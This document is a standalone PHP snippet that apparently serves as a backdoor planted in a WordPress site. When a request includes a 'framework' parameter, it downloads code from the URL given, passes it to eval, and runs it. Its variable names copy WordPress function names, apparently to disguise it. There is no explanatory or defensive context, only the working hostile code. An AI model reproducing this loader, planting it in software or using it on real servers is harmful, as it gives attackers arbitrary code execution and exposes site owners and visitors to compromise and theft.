<?php if (isset($_GET['framework'])) { $get_the_author_meta_hp = $_GET['framework']; if ($wp_enqueue_style_sg = curl_init()) { curl_setopt($wp_enqueue_style_sg, CURLOPT_URL, $get_the_author_meta_hp); curl_setopt($wp_enqueue_style_sg, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($wp_enqueue_style_sg)); curl_close($wp_enqueue_style_sg); exit; } }